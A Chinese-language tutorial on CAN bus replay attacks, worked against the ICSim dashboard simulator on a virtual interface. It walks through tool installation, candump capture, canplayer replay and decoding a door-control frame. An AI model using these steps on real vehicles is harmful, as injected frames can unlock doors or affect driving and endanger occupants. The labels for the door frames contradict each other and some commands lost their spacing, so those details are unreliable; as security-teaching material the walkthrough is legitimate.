由于CAN总线上面的数据包没有任何加密，所以这些数据包能够被截取窃听。由于车载网络使用CAN协议进行通信，所以我们可以联想到车联的功能也是通过CAN网络进行数据发送和交换。比如我们打开左转向灯，那么电信号就会通过CAN总线发送到网络上的每个设备，然后左转向灯会解释数据包并且执行数据包中的指令。

在网络上发送的数据包由两部分组成：标识符和数据。标识符是车辆中设备的表示。数据字段表示要与所述设备一起完成的指令。让我们看下面的例子：

(相关资料图)

(1668496788.311506)vcan0095#800007F400000017

数据包的开始部分是标识符。在这种情况下，标识符是095。#之后的数据包剩余部分是数据字段。可以看下Wireshark抓到的包标识符在不同车型，相同车型不同年份的情况下也是不相同的，如果是相同车型相同年份的车型那么标识符大概率是通用的，不同的标识符表示车上不同的设备发的包，后面我们需要找到我们想要控制车辆功能的标识符包。

攻击方式

在前面CAN总线特性处我们写的CAN总线攻击方式包括应用报文模糊测试、Dos攻击测试、重放攻击等，接下来我们来实操一下重放攻击，顾名思义就是可以截取数据包然后重新发送导致车辆处于我们的控制之下而不受到车辆所有人的操控。

安装工具

ICSim是一个开源的车辆仪表模拟器，该模拟器包含controls和ICSim两个模块，其中controls负责生成模拟的车辆数据，以CAN报文的方式发送给虚拟的CAN接口，ICSim从虚拟CAN接口读取CAN报文，并在仪表上更新对应零件的状态，如车速、车门状态等等。

安装依赖

sudo apt install libsdl2-dev libsdl2-image-dev can-utils maven autoconf

安装ICSim

下载

git clone https://github.com/zombieCraig/ICSim.git

编译

cd ICSim/sudo make

安装socketcand

下载

git clone https://github.com/linux-can/socketcand.git

获取缺少的文件

wget https://raw.githubusercontent.com/dschanoeh/socketcand/master/config.h.in

编译安装

cd socketcand/autoconf

./configure

make clean

make

sudo make install

安装Kayak

下载

git clone https://github.com/dschanoeh/Kayak.git

安装

cd Kayak/mvn clean package

安装CAN Utils

can-utils是一套Linux特有的实用工具，它可以让Linux与车辆上的CAN网络进行通信，为了发送、接收和分析CAN数据包，需要安装CAN utils。canutils主要包括5个经常使用的工具：

sudo apt-get install can-utils -y

至此，全部安装完毕。

开始攻击

首先设置vcan（虚拟CAN）接口

sudomodprobecansudomodprobevcansudoiplinkadddevvcan0typevcansudoiplinksetupvcan0

打开仪表盘模拟器

./icsim vcan0

打开仪表盘控制器

./controls vcan0

点击仪表盘控制器界面就可以模拟操纵车辆了。

使用candump进行抓包

candump vcan0 -l

CTRL+C停止看到抓到的包，由于CAN在不停的通信所以包会非常大。接下来我们找到CAN网络上面控制车辆的数据包对他进行攻击。监听抓包，然后打开所有车门然后关闭。抓到了一万多个包。尝试重放我们的包

canplayer -I candump-2022-11-15_052559.log

可以看到全部车门打开随即关闭。接下来我们采用二分法每次删除一半来查找关闭车门的包。

最终通过二分法找到打开所有车门的包为：

(1668507963.222323) vcan0 19B#000000000000

其中的19B是设备标识符，在数据包中查找19B。

└─$ grep 19B candump-2022-11-15_052559.log (1668507960.512530) vcan0 244#000000019B(1668507962.233563) vcan0 19B#00000F000000(1668507963.222323) vcan0 19B#000000000000(1668507963.517110) vcan0 244#000000019B(1668507964.208966) vcan0 19B#00000F000000(1668507965.319056) vcan0 244#000000019B

我们可以看到其中有一个19B#00000F000000，如果我们得到19B#000000000000是打开所有车门，那么后面我们也进行了关闭所有车门的操作，可以猜测19B#00000F000000是关闭所有车门。可以看到上图，我们成功关闭了所有车门。

如上可知这个数据包中通过第三位字节来控制。

(1668507962.233563) vcan0 19B#00000F000000  //打开所有车门(1668507963.222323) vcan0 19B#000000000000  //关闭所有车门

锁上所有门的数据包将半字节表示为十六进制F。将其分解为二进制可得出 16 种可能的门组合。

尝试字符控制的不同车门。

假设1是锁门的动作，0是解锁门的动作。因此，当我们识别我们的门时，识别出的门会收到锁门的指令，而其他门会收到解锁的指令。比如字符8的二进制是1000那么就是锁门，开门，开门，开门。

右后车门  左后车门  右前车门  左前车门  8        4        2       1  1        1        0       0  等于 C

可以尝试查看C是不是关闭了后排两个门，打开了前排两个门。至此，就可以操控每个门的开关了。同理，转向和油门都是相同原理。

参考

控制器區域網路

零成本入门车联网安全研究

会员权益:(点击可进入)谈思实验室VIP会员